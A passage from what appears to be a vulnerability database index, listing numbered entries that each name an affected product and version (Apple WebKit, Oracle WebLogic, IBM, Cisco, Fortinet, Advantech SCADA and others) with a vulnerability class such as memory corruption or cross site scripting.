memory corruption [138641] Apple tvOS up to 12.3 WebKit memory corruption [138640] Apple tvOS up to 12.3 WebKit memory corruption [138639] Apple tvOS up to 12.3 WebKit Universal information disclosure [138638] Apple tvOS up to 12.3 WebKit Universal cross site scripting [138637] Apple tvOS up to 12.3 WebKit Universal cross site scripting [138603] Apple macOS up to 10.14.5 WebKit memory corruption [138602] Apple macOS up to 10.14.5 WebKit memory corruption [138601] Apple macOS up to 10.14.5 WebKit memory corruption [138600] Apple macOS up to 10.14.5 WebKit memory corruption [138599] Apple macOS up to 10.14.5 WebKit memory corruption [138598] Apple macOS up to 10.14.5 WebKit memory corruption [138597] Apple macOS up to 10.14.5 WebKit memory corruption [138596] Apple macOS up to 10.14.5 WebKit memory corruption [138595] Apple macOS up to 10.14.5 WebKit memory corruption [138594] Apple macOS up to 10.14.5 WebKit memory corruption [138593] Apple macOS up to 10.14.5 WebKit memory corruption [138592] Apple macOS up to 10.14.5 WebKit memory corruption [138591] Apple macOS up to 10.14.5 WebKit memory corruption [138590] Apple macOS up to 10.14.5 WebKit memory corruption [138589] Apple macOS up to 10.14.5 WebKit memory corruption [138588] Apple macOS up to 10.14.5 WebKit memory corruption [138587] Apple macOS up to 10.14.5 WebKit memory corruption [138586] Apple macOS up to 10.14.5 WebKit memory corruption [138585] Apple macOS up to 10.14.5 WebKit memory corruption [138584] Apple macOS up to 10.14.5 WebKit Universal information disclosure [138583] Apple macOS up to 10.14.5 WebKit Universal cross site scripting [138582] Apple macOS up to 10.14.5 WebKit Universal cross site scripting [138559] Apple watchOS up to 5.2.1 WebKit memory corruption [138558] Apple watchOS up to 5.2.1 WebKit memory corruption [138557] Apple watchOS up to 5.2.1 WebKit memory corruption [138556] Apple watchOS up to 5.2.1 WebKit memory corruption [138555] Apple watchOS up to 5.2.1 WebKit memory corruption [138554] Apple watchOS up to 5.2.1 WebKit memory corruption [138553] Apple watchOS up to 5.2.1 WebKit memory corruption [138552] Apple watchOS up to 5.2.1 WebKit memory corruption [138551] Apple watchOS up to 5.2.1 WebKit Universal information disclosure [138449] WebAppick WooCommerce Product Feed up to 2.2.18 on WordPress Editing Theme File woo-feed-manage-list.php:63 cross site scripting [138411] Cherokee Web Server 1.2.103 memory corruption [138349] Alt-N MDaemon WebMail cross site request forgery [138235] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting [138197] Jenkins up to LTS 2.176.1/2.185 Stapler Web Framework information disclosure [138184] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting [138150] Oracle Agile PLM 9.3.3/9.3.4/9.3.5 Oracle WebLogic Server privilege escalation [138027] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collector privilege escalation [138026] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 OpenSSL privilege escalation [138022] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collector cross site scripting [138018] Oracle WebCenter Sites 12.2.1.3.0 Oracle WebLogic Server privilege escalation [138016] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation [138015] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation [138014] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload privilege escalation [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload privilege escalation [137998] Oracle WebCenter Sites 12.2.1.3.0 OpenSSL privilege escalation [137877] Oracle Converged Application Server 5.1/7.0/7.1 WebLogic Server privilege escalation [137849] python-engineio up to 3.8.2 Websocket cross site request forgery [137826] Deepwoods WebLibrarian up to 3.5.2 on WordPress admin.php AllBarCodes Blind sql injection [137818] PHP Scripts Mall Website Seller Script up to 2.0.3 user_submit.php cross site scripting [137638] GitLab Community Edition/Enterprise Edition up to 11.3.10/11.4.7/11.5.0 Webhooks privilege escalation [137636] GitLab Community Edition/Enterprise Edition up to 11.3.10/11.4.7/11.5.0 Web UI privilege escalation [137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation [137499] Zoom/RingCentral Client on MacOS Web Server Video privilege escalation [137474] Quest KACE Administrator User Interface privilege escalation [137455] D-Link Central WiFi Manager CWM(100) /web/Public/Conn.php sql injection [137414] Squid Web Proxy up to 4.7 Web Module cachemgr.cgi cross site scripting [137377] Cisco Web Security Appliance HTTPS Decryption privilege escalation [137310] F5 BIG-IP AFM/BIG-IP Analytics/BIG-IP ASM up to 11.6.3.4/12.1.4/13.1.1.4/14.0.0.4/14.1.0.5 Traffic Management User Interface Reflected cross site scripting [137309] F5 BIG-IP up to 11.6.4/12.1.4/13.1.1.4/14.0.0.4/14.1.0.5 Traffic Management User Interface Reflected cross site scripting [137238] Moxa OnCell G3100-HSPA up to 1.4 Build 16062919 Web Application cross site request forgery [137237] Moxa OnCell G3100-HSPA up to 1.4 Build 16062919 Web Application weak authentication [137211] IBM Security Guardium 10.5 Web Server privilege escalation [137136] IBM Business Automation Workflow 18.0.0.0/18.0.0.1/18.0.0.2/19.0.0.1 Web UI cross site scripting [137066] Advantech WebAccess/SCADA up to 8.3.5 denial of service [137065] Advantech WebAccess/SCADA 8.3.5 memory corruption [137064] Advantech WebAccess/SCADA 8.3.5 memory corruption [137063] Advantech WebAccess/SCADA 8.3.5 memory corruption [137062] Advantech WebAccess/SCADA up to 8.3.5 directory traversal [137061] Advantech WebAccess/SCADA up to 8.3.5 information disclosure [137055] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Admin Console information disclosure [136914] Moodle up to 3.6.3 Web Service privilege escalation [136882] IBM Security Access Manager up to 9.0.6 Web UI cross site scripting [136803] Cisco IOS XE Web UI cross site request forgery [136779] Sophos XG Firewall 17.0.8 MR-8 Admin Portal /webconsole/Controller privilege escalation [136771] Oracle Fusion Middleware 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 WebLogic Server privilege escalation [136722] Cisco SD-WAN Solution vManage Web-based UI privilege escalation [136695] IBM Maximo Asset Management 7.6 Web UI cross site scripting [136656] Advantech WebAccess/SCADA 8.4.0 RPC Call memory corruption [136640] Advantech WebAccess/SCADA 8.4.0 memory corruption [136594] Linksys WRT1900ACS 1.0.3.187766 Webserver setup.js.localized Password privilege escalation [136591] HP Embedded Web Server memory corruption [136590] HP Embedded Web Server cross site request forgery [136589] HP Embedded Web Server Stored cross site scripting [136588] HP Embedded Web Server Reflected cross site scripting [136581] IBM Cognos Controller 10.2.0/10.2.1/10.3.0/10.3.1/10.4.0 Web UI cross site scripting [136530] Webmin up to 1.910 Package Updates Module update.cgi privilege escalation [136521] IBM Connections 6.0 Web UI cross site scripting [136439] Cisco IOS XE Web UI cross site request forgery [136427] Undertow Web Server up to 2.0.21 Credentials privilege escalation [136412] SAP NetWeaver Process Integration up to 7.50 PI Integration Builder Web UI information disclosure [136410] SAP NetWeaver Process Integration up to 7.50 Web Pages information disclosure [136250] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_free_proto_data_cgi memory corruption [136249] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_free_proto_data_cgi memory corruption [136248] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_get_proto_data memory corruption [136247] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_get_proto_data memory corruption [136246] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_cgi_ev_handler memory corruption [136204] Munica Web Server 1.14 Communication privilege escalation [136160] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 Profile Update Page Stored cross site scripting [135959] Fortinet FortiOS 6.0.0/6.0.1/6.0.2/6.0.3/6.0.4 SSL VPN Web Portal Reflected cross site scripting [135957] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Reflected cross site scripting [135937] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Redirect [135936] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Password privilege escalation [135935] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal memory corruption [135934] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal cross site scripting [135933] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal directory traversal [135806] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135805] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135804] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135803] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135802] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135801] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135800] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135799] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135798] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135797] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135796] Apple iCloud up to 7.11 on Windows WebKit privilege escalation [135795] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135794] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135793] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135792] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135791] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135790] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135789] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135788] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135787] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135786] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135727] Synacor Zimbra Collaboration Suite/Zimbra Web Client up to 8.8.8 Patch 6/8.8.9 Briefcase Persistent cross site scripting [135718] Horde Groupware Webmail Edition 5.2.17/5.2.22 Image Upload Horde/Form/Type.php onSubmit privilege escalation [135701] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting [135700] IBM Cognos Analytics 11.0/11.1.0/11.1.1 Web UI cross site scripting [135698] IBM Tivoli Storage Productivity Center up to 5.3.0.1 Web UI cross site scripting [135680] Auerswald COMfort 1200 IP Phone 3.4.4.1-10589 Configuration Interface memory corruption [135679] Auerswald COMfort 1200 IP Phone 3.4.4.1-10589 FTP Upgrade Configuration Interface privilege escalation [135674] Synacor Zimbra Collaboration Suite up to 8.8.10 Web Client cross site scripting [135673] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal memory corruption [135658] Webbukkit Dynmap 3.0-beta-3 MapStorageHandler.java privilege escalation [135555] QEMU 4.0.0 hw/display/qxl.c interface_release_resource denial of service [135551] Quest KACE Systems Management Appliance up to 9.0 Web Application kbot_service_notsoap.php Reflected cross site scripting [135439] Western Digital PR4100 up to 2.31 cgi-bin/webfile_mgr.cgi privilege escalation [135288] IBM BigFix Platform 9.2/9.5 User Interface 7PK Security Features [135287] IBM BigFix Platform 9.2/9.5 Web UI cross site scripting [135271] OPNsense/pfsense WebUI privilege escalation [135221] IBM WebSphere Application Server 8.5/9.0 privilege escalation [135077] Cisco NX-OS NX-API Sandbox Interface cross site scripting [135050] Siemens SIMATIC HMI Comfort Panel Web Server cross site scripting [135027] Siemens SIMATIC PCS 7/SIMATIC WinCC DCOM Interface privilege escalation [134989] Apple watchOS up to 5.2.0 WebKit memory corruption [134988] Apple watchOS up to 5.2.0 WebKit memory corruption [134987] Apple watchOS up to 5.2.0 WebKit memory corruption [134986] Apple watchOS up to 5.2.0 WebKit memory corruption [134985] Apple watchOS up to 5.2.0 WebKit information disclosure [134965] Apple tvOS up to 12.2.1 WebKit memory corruption [134964] Apple tvOS up to 12.2.1 WebKit memory corruption [134963] Apple tvOS up to 12.2.1 WebKit memory corruption [134962] Apple tvOS up to 12.2.1 WebKit memory corruption [134961] Apple tvOS up to 12.2.1 WebKit information disclosure [134960] Apple tvOS up to 12.2.1 WebKit memory corruption [134959] Apple tvOS up to 12.2.1 WebKit memory corruption [134958] Apple tvOS up to 12.2.1 WebKit memory corruption [134957] Apple tvOS up to 12.2.1 WebKit memory corruption [134956] Apple tvOS up to 12.2.1 WebKit memory corruption [134955] Apple tvOS up to 12.2.1 WebKit privilege escalation [134954] Apple tvOS up to 12.2.1 WebKit memory corruption [134953] Apple tvOS up to 12.2.1 WebKit memory corruption [134952] Apple tvOS up to 12.2.1 WebKit memory corruption [134951] Apple tvOS up to 12.2.1 WebKit memory corruption [134950] Apple tvOS up to 12.2.1 WebKit memory corruption [134949] Apple tvOS up to 12.2.1 WebKit memory corruption [134948] Apple tvOS up to 12.2.1 WebKit memory corruption [134947] Apple tvOS up to 12.2.1 WebKit memory corruption [134946] Apple tvOS up to 12.2.1 WebKit memory corruption [134945] Apple tvOS up to 12.2.1 WebKit information disclosure [134888] Apple macOS up to 10.14.4 WebKit information disclosure [134887] Apple macOS up to 10.14.4 WebKit memory corruption [134886] Apple macOS up to 10.14.4 WebKit memory corruption [134885] Apple macOS up to 10.14.4 WebKit memory corruption [134884] Apple macOS up to 10.14.4 WebKit memory corruption [134883] Apple macOS up to 10.14.4 WebKit information disclosure [134882] Apple macOS up to 10.14.4 WebKit memory corruption [134881] Apple macOS up to 10.14.4 WebKit memory corruption [134880] Apple macOS up to 10.14.4 WebKit memory corruption [134879] Apple macOS up to 10.14.4 WebKit memory corruption [134878] Apple macOS up to 10.14.4 WebKit memory corruption [134877] Apple macOS up to 10.14.4 WebKit privilege escalation [134876] Apple macOS up to 10.14.4 WebKit memory corruption [134875] Apple macOS up to 10.14.4 WebKit memory corruption [134874] Apple macOS up to 10.14.4 WebKit memory corruption [134873] Apple macOS up to 10.14.4 WebKit memory corruption [134872] Apple macOS up to 10.14.4 WebKit memory corruption [134871] Apple macOS up to 10.14.4 WebKit memory corruption [134870] Apple macOS up to 10.14.4 WebKit memory corruption [134869] Apple macOS up to 10.14.4 WebKit memory corruption [134868] Apple macOS up to 10.14.4 WebKit memory corruption [134664] Easy File Sharing Web Server 7.2 Topic forum.ghp memory corruption [134580] IBM Business Automation Workflow 18.0.0.0/18.0.0.1/18.0.0.2/19.0.0.1 Web UI cross site scripting [134361] Cisco Web Security Appliance Web Proxy Function privilege escalation [134359] Cisco Umbrella Dashboard Web UI weak authentication [134346] Cisco ASA/Firepower Threat Defense WebVPN Service cross site scripting [134340] Cisco ASA/Firepower Threat Defense WebVPN Service denial of service [134328] Cisco ASA/Firepower Threat Defense WebVPN Login denial of service [134302] IBM Sterling B2B Integrator 6.0.0.0/6.0.0.1 Web UI cross site scripting [134292] Rockwellautomation Armor Compact GuardLogix 5370 Web Server memory corruption [134192] Webdorado Contact Form Plugin up to 1.13.4 on WordPress wp-admin/admin-ajax.php cross site request forgery [134191] 10Web Form Maker Plugin up to 1.13.4 on WordPress wp-admin/admin-ajax.php cross site request forgery [134189] IBM Jazz Reporting Service up to 6.0.6 Web UI cross site scripting [134144] Webdorado Contact Form Builder Plugin up to 1.0.68 on WordPress wp-admin/admin-ajax.php cross site request forgery [134070] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting [134068] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134065] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134064] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134063] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134062] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134061] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting [134040] TIBCO ActiveMatrix BPM Administrative Web Server Credentials privilege escalation [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation [133465] GitLab Community/Enterprise up to 11.6.9/11.7.5/11.8.0 User Interface 7PK Security Features [133451] Siemens CP1604 Webserver privilege escalation [133414] IBM BigFix WebUI Profile Management Back-End Database sql injection [133332] MikroTik RouterOS up to 6.43.12 Interfaces directory traversal [133321] SAP Crystal Reports for Visual Studio .NET SDK WebForm Viewer Credentials information disclosure [133318] SAP NetWeaver Process Integration Web Page information disclosure [133313] Juniper Junos Management Interface privilege escalation [133307] Juniper Junos Management Interface Buffer denial of service [133303] Juniper Junos Telemetry Interface privilege escalation [133295] PRTG up to 19.1.49 WebGUI cross site scripting [133265] Advantech WebAccess 8.3.4 privilege escalation [133264] Advantech WebAccess 8.3.4 File Upload privilege escalation [133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation [133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133082] Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 Credentials privilege escalation [133080] Advantech WebAccess SCADA up to 8.3.5 Access Control privilege escalation [133079] Advantech WebAccess SCADA up to 8.3.5 privilege escalation [133078] Advantech WebAccess SCADA up to 8.3.5 memory corruption [132714] IBM WebSphere Application Server 7.5/8.0/8.5/9.0 Admin Console denial of service [132684] Grandstream GXP16xx VoIP 1.0.4.128 SSH Configuration Interface privilege escalation [132579] Ucweb UC Browser up to 2019-03-26 on Android PDF Module Download weak encryption [132539] Cisco IOS XE Gigabit Ethernet Management Interface privilege escalation [132535] Cisco IOS XE Web Services Management Agent privilege escalation [132533] Cisco IOS XE Web UI privilege escalation [132524] Cisco IOS XE Web UI Framework privilege escalation [132523] Cisco IOS XE Web UI privilege escalation [132498] Rockwell Automation EtherNet-IP Web Server Module 1756-EWEB SNMP Service privilege escalation [132438] CMS Made Simple 2.2.10 News Module moduleinterface.php cross site scripting [132416] Apple iCloud up to 7.10 on Windows WebKit Universal cross site scripting [132415] Apple iCloud up to 7.10 on Windows WebKit Memory privilege escalation [132414] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132413] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132412] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132411] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132410] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132409] Apple iCloud up to 7.10 on Windows WebKit information disclosure [132408] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132407] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132406] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132405] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132404] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132403] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132402] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132401] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132400] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132318] Apple tvOS up to 12.1.2 WebKit Memory privilege escalation [132317] Apple tvOS up to 12.1.2 WebKit privilege escalation [132316] Apple tvOS up to 12.1.2 WebKit privilege escalation [132315] Apple tvOS up to 12.1.2 WebKit memory corruption [132314] Apple tvOS up to 12.1.2 WebKit memory corruption [132313] Apple tvOS up to 12.1.2 WebKit memory corruption [132312] Apple tvOS up to 12.1.2 WebKit memory corruption [132311] Apple tvOS up to 12.1.2 WebKit information disclosure [132310] Apple tvOS up to 12.1.2 WebKit memory corruption [132309] Apple tvOS up to 12.1.2 WebKit memory corruption [132308] Apple tvOS up to 12.1.2 WebKit memory corruption [132307] Apple tvOS up to 12.1.2 WebKit memory corruption [132306] Apple tvOS up to 12.1.2 WebKit memory corruption [132305] Apple tvOS up to 12.1.2 WebKit memory corruption [132304] Apple tvOS up to 12.1.2 WebKit memory corruption [132303] Apple tvOS up to 12.1.2 WebKit memory corruption [132302] Apple tvOS up to 12.1.2 WebKit memory corruption [132301] Apple tvOS up to 12.1.2 WebKit Universal cross site scripting [132217] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Request Header denial of service [132175] ovirt-engine up to 4.1 REST Interface Password privilege escalation [132150] CMS Made Simple 2.2.10 New Profile moduleinterface.php cross site scripting [132079] Veritas NetBackup Appliance up to 3.1.2 Web Console Password privilege escalation [132078] Veritas NetBackup Appliance up to 3.1.2 Web Console Password privilege escalation [131964] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 assets/ directory traversal [131963] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 Javascript memory corruption [131962] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 privilege escalation [131957] PHP Scripts Mall Website Seller Script 2.0.5 URL Path directory traversal [131914] Webmin 1.890 /config.cgi cross site scripting [131901] IBM WebSphere MQ up to 9.1.0.1 Web UI cross site scripting [131853] Schneider Electric Modicon BMXNOC0401 PCL Web Server Remote File Inclusion privilege escalation [131780] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131779] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131778] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131777] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131773] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131772] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131770] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting [131702] F5 BIG-IP/Enterprise Manager Traffic Management User Interface privilege escalation [131701] F5 BIG-IP/Enterprise Manager Traffic Management User Interface privilege escalation [131556] IBM WebSphere up to 9.1.1 Multiplexed Channel privilege escalation [131553] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Connection information disclosure [131414] Webmin 1.900 Java File Manager /updown/upload.cgi privilege escalation [131398] IBM WebSphere Application Server 8.5/9.0 Web UI cross site scripting [131350] PSI GridConnect GmbH Telecontrol Gateway Web Application Browser privilege escalation [131343] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting [131342] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting [131341] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting [131221] F5 BIG-IP Access Policy Manager 11.5.x/11.6.x Admin Web UI cross site scripting [131203] Cisco WebEx Teams 3.13.26920 on iOS Client Application privilege escalation [131142] PHP Scripts Mall Auction Website Script 2.0.4 privilege escalation [131095] MDaemon Webmail up to 18.5.1 cross site scripting [131094] MDaemon Webmail up to 18.5.1 cross site scripting [131091] Drupal up to 8.5.10/8.6.9 RESTful Web Services privilege escalation [131071] IBM Security Identity Governance/Intelligence up to 5.2.4.1 Web UI cross site scripting [131065] Splunk Enterprise/Light Web Persistent cross site scripting [131000] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 TLS Configuration information disclosure [130901] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting [130887] F5 BIG-IP up to 11.6.3.2/12.1.3.7/13.1.1.3/14.0.0.2 Traffic Management User Interface Reflected cross site scripting [130858] D-Link DIR-878 1.12A1 HNAP API /HNAP1 SetWebFilterSettings privilege escalation [130850] Joomla CMS up to 3.9.2 Web Server Configuration cross site scripting [130845] AVEVA InduSoft Web Studio/InTouch Edge HMI Database Connection unknown vulnerability [130844] AVEVA InduSoft Web Studio/InTouch Edge HMI weak authentication [130681] Cisco Web Security Appliance 10.1.x/10.5.x Decryption Policy Default Action denial of service [130639] Cisco Webex Business Suite up to 3.0.8 privilege escalation [130569] Advantech WebAccess SCADA 8.3 SQL Command sql injection [130568] Advantech WebAccess SCADA 8.3 weak authentication [130567] Advantech WebAccess SCADA 8.3 weak authentication [130487] ZoneMinder up to 1.32.3 web/skins/classic/views Reflected cross site scripting [130441] FreeBSD CVSWeb 2.x cross site scripting [130331] Comodo UTM Firewall up to 2.6.x Web Console weak authentication [130269] Calmar Webmedia Total Donations Plugin up to 2.0.5 on WordPress Access Control migla_ajax_functions.php privilege escalation [130220] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130219] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130218] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130217] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130216] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130215] Cisco Webex Teams Client URI privilege escalation [130125] Jenkins up to 2.145 Stapler Web Framework Facet.java directory traversal [130120] Apple macOS WebRTC memory corruption [130097] Apple iCloud up to 7.9 on Windows WebKit Universal cross site scripting [130096] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130095] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130094] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130093] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130092] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130091] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130090] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130089] Apple iCloud up to 7.9 on Windows WebKit privilege escalation [130075] Apple watchOS up to 5.1.2 WebKit memory corruption [130074] Apple watchOS up to 5.1.2 WebKit memory corruption [130073] Apple watchOS up to 5.1.2 WebKit memory corruption [130072] Apple watchOS up to 5.1.2 WebKit memory corruption [130058] Apple tvOS up to 12.1.1 WebKit memory corruption [130057] Apple tvOS up to 12.1.1 WebKit memory corruption [130056] Apple tvOS up to 12.1.1 WebKit memory corruption [130055] Apple tvOS up to 12.1.1 WebKit memory corruption [130054] Apple tvOS up to 12.1.1 WebKit privilege escalation [130053] Apple tvOS up to 12.1.1 WebKit Universal cross site scripting [130052] Apple tvOS up to 12.1.1 WebKit memory corruption [130051] Apple tvOS up to 12.1.1 WebKit memory corruption [130050] Apple tvOS up to 12.1.1 WebKit memory corruption [129766] Juniper Junos Management Interface privilege escalation [129619] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation [129595] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Deployment privilege escalation [129593] Oracle WebLogic Server 12.2.1.3 Application Container JavaEE privilege escalation [129592] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server privilege escalation [129572] Oracle WebLogic Server 12.1.3.0/12.2.1.3 jQuery cross site scripting [129571] Oracle WebCenter Sites 11.1.1.8.0 Jython cross site scripting [129568] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 AntiSamy privilege escalation [129564] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 Spring Framework privilege escalation [129558] Oracle WebLogic Server 12.2.1.3 AntiSamy weak encryption [129557] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 AntiSamy weak encryption [129540] Oracle WebCenter Portal 12.2.1.3.0 AntiSamy privilege escalation [129539] Oracle WebLogic Server 12.2.1.3 jQuery XML External Entity [129486] Oracle Communications WebRTC Session Controller up to 7.1 jQuery FileUpload Key Management Error [129483] Oracle Communications WebRTC Session Controller up to 7.1 OpenSSL cross site scripting [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik privilege escalation [129478] Oracle Communications WebRTC Session Controller up to 7.1 libgcrypt information disclosure [129477] Oracle Communications WebRTC Session Controller up to 7.1 cURL memory corruption [129476] Oracle Communications WebRTC Session Controller up to 7.1 Bouncy Castle Java Library weak encryption [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 memory corruption [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j privilege escalation [129151] IBM Security Identity Manager 6.0.0 Web UI cross site scripting [129002] Cisco Webex Business Suite MyWebex cross site scripting [128989] Cisco IP Phone 8800 User Interface privilege escalation [128981] McAfee Web Gateway 7.8.2.0 privilege escalation [128778] SAP CRM WebClient UI cross site scripting [128777] SAP CRM WebClient UI cross site scripting [128766] IBM Jazz Reporting Service 6.0.3/6.0.4/6.0.5/6.0.6 Web UI cross site scripting [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 information disclosure [128691] Webroot BrightCloud SDK Header bc_http_read_header memory corruption [128498] PHP Scripts Mall Website Seller Script 2.0.5 Profile cross site scripting [128112] Advantech WebAccess SCADA 8.3.2 on Windows 2008 privilege escalation [128100] Webroot BrightCloud SDK HTTP Client weak authentication [128082] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server privilege escalation [128081] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server information disclosure [128080] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server Redirect [128033] Bosch IP Camera 6.32 Network Interface memory corruption [128032] IBM Security Guardium 10.0/10.5 Web UI cross site scripting [128031] IBM Security Guardium 10.0/10.5 Web UI cross site scripting [127986] IBM Business Automation Workflow 18.0.0.0/18.0.0.1 Web UI cross site scripting [127959] IBM Security Guardium 10/10.5 Web UI cross site scripting [127958] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting [127949] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting [127942] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting [127936] Siemens SIMATIC HMI Comfort Panel Webserver Header Injection privilege escalation [127935] Siemens SIMATIC HMI Comfort Panel Webserver Redirect [127912] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Admin Console cross site request forgery [127911] IBM 